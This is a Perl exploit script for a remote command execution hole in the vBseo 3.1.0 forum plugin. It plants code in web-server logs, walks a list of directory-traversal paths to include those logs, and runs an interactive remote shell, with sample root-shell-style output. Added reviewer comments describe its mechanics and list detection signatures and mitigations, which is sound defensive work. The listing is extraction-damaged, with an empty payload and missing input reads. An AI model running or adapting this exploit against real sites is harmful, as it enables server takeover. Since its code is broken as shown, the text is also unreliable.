#!/usr/bin/perl
####################################################################
# vBseo 3.1.0 (vbseo.php vbseourl) Remote Command Execution Exploit
# vendor: http://www.vbseo.com/
#
# Author: Jose Luis Gongora Fernandez (a.k.a) JosS
# twitter: @JossGongora
# mail: joss.xroot(0x40)gmail(0x2e)com
# site: http://www.hack0wn.com/
#
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# thanks: CWH Underground
#
####################################################################
# OUTPUT:
#
# Trying to Inject the Code...
# Successfully injected in ../../../../../../../var/log/apache2/access.log
#
# [shell]:~$ id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# [shell]:~$ uname -a
# Linux mediapc 2.6.18-6-686 #1 SMP Sat Dec 27 09:31:05 UTC 2008 i686 GNU/Linux
# [shell]:~$ exit
# joss@h4x0rz:~/Desktop$
#
# NOTE(review): this listing reached the page with its line breaks collapsed
# and is extraction-damaged: the value assigned to $CODE is empty and the
# right-hand side of both `$cmd =` assignments is missing, so it does not
# compile as shown. The line breaks below are reconstructed; no code token
# was changed.
#
# What the visible code does:
#   1. sends one raw request for /images/ whose path carries $CODE between
#      two "##%$$%##" markers (the sample output above suggests the aim is
#      to have that text recorded in a web-server log);
#   2. requests vbseo.php with vbseoembedd=1 and vbseourl set to each
#      relative log path in @apache until a response contains the marker;
#   3. repeats that request with an added cmd= parameter and prints the text
#      found between the two markers in the response.
# Presumably vbseourl reaches a file include without path validation; the
# script itself does not show the server side -- confirm against the vendor
# advisory.
#
# Detection: requests to vbseo.php that combine vbseoembedd=1 with a vbseourl
# value containing "../" sequences or log-file paths, a cmd= parameter on the
# same URL, and the literal marker "##%$$%##" in access or error logs.
# Mitigation: move to a vendor-fixed vBseo release or remove the component,
# restrict vbseourl to an allowlist of expected values, confine PHP file
# access (e.g. open_basedir), and keep web-server logs unreadable by the
# account that runs PHP.

use LWP::UserAgent;
use IO::Socket;
use LWP::Simple;

# Candidate log locations, expressed relative to the web application so they
# can be appended to the vbseourl parameter. Kept exactly as published; the
# paths double as signatures when searching request logs for this probe.
@apache=(
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../etc/httpd/logs/acces_log",
"../../../../../../../etc/httpd/logs/acces.log",
"../../../../../../../etc/httpd/logs/error_log",
"../../../../../../../etc/httpd/logs/error.log",
"../../../../../../../var/www/logs/access_log",
"../../../../../../../var/www/logs/access.log",
"../../../../../../../usr/local/apache/logs/access_log",
"../../../../../../../usr/local/apache/logs/access.log",
"../../../../../../../var/log/apache/access_log",
"../../../../../../../var/log/apache2/access_log",
"../../../../../../../var/log/apache/access.log",
"../../../../../../../var/log/apache2/access.log",
"../../../../../../../var/log/access_log",
"../../../../../../../var/log/access.log",
"../../../../../../../var/www/logs/error_log",
"../../../../../../../var/www/logs/error.log",
"../../../../../../../usr/local/apache/logs/error_log",
"../../../../../../../usr/local/apache/logs/error.log",
"../../../../../../../var/log/apache/error_log",
"../../../../../../../var/log/apache2/error_log",
"../../../../../../../var/log/apache/error.log",
"../../../../../../../var/log/apache2/error.log",
"../../../../../../../var/log/error_log",
"../../../../../../../var/log/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/access_log"
);

# Clear the terminal with the platform's command before printing the banner.
system(($^O eq 'MSWin32') ? 'cls' : 'clear');

print "#######################################################################\n";
print "# vBseo 3.1.0 (vbseo.php vbseourl) Remote Command Execution Exploit #\n";
print "#######################################################################\n\n";

# A host argument is required; without it only the usage text is printed.
if (!$ARGV[0])
{
    print "Usage: perl exploit.pl [host]\n";
    print " perl exploit.pl localhost\n\n";
    exit;}

$host=$ARGV[0];
$path="/vbseo.php?vbseoembedd=1&vbseourl="; # change if it is necessary
#
# NOTE(review): the lone '#' above is read as an empty comment line, which
# makes the statement below live code -- confirm against the original file.
# It drops any "http://" prefix so the bare host can be used for the socket.
if ( $host =~ /^http:/ ) {$host =~ s/http:\/\///g;}

print "\nTrying to Inject the Code...\n";

# NOTE(review): empty in this listing; the published value was lost in
# extraction.
$CODE="";
# Raw TCP connection to port 80, used for the single marker-carrying request.
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";
# The request path wraps $CODE in the "##%$$%##" marker on both sides; the
# same marker is searched for in the responses further down.
print $socket "GET /images/"."\#\#%\$\$%\#\#".$CODE."\#\#%\$\$%\#\#" . "HTTP/1.1";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);

# The LWP requests below need a full URL, so the scheme is put back.
if ( $host !~ /^http:/ ) {$host = "http://" . $host;}

# Try each candidate path through vbseourl and stop at the first response
# that contains the marker; that path is remembered in $log.
foreach $getlog(@apache)
{
    chomp($getlog);
    $find= $host.$path.$getlog; # $find= $host.$path.$getlog."%00";
    $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $req = HTTP::Request->new(GET => $find);
    $res = $xpl->request($req);
    $info = $res->content;
    if($info =~ /\#\#\%\$\$\%\#\#/) # change if it is necessary
    {print "Successfully injected in $getlog \n\n";$log=$getlog; last;}
}

print "[shell]:~\$ ";
# NOTE(review): the right-hand side of this assignment is missing in the
# listing (syntax error as shown).
chomp( $cmd = );

# Prompt loop: runs until the entered text matches "exit". Each pass requests
# the path stored in $log with the entered text appended as cmd= and prints
# the response text captured between the two markers.
while($cmd !~ "exit")
{
    $shell= $host.$path.$log."&cmd=$cmd"; # $shell= $host.$path.$log."%00&cmd=$cmd";
    $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $req = HTTP::Request->new(GET => $shell);
    $res = $xpl->request($req);
    $info = $res->content;
    if ($info =~ /\#\#%\$\$%\#\#(.*?)\#\#%\$\$%\#\#/sg)
    {print $1;}
    print "[shell]:~\$ ";
    # NOTE(review): same missing right-hand side as the first prompt read.
    chomp( $cmd = );
}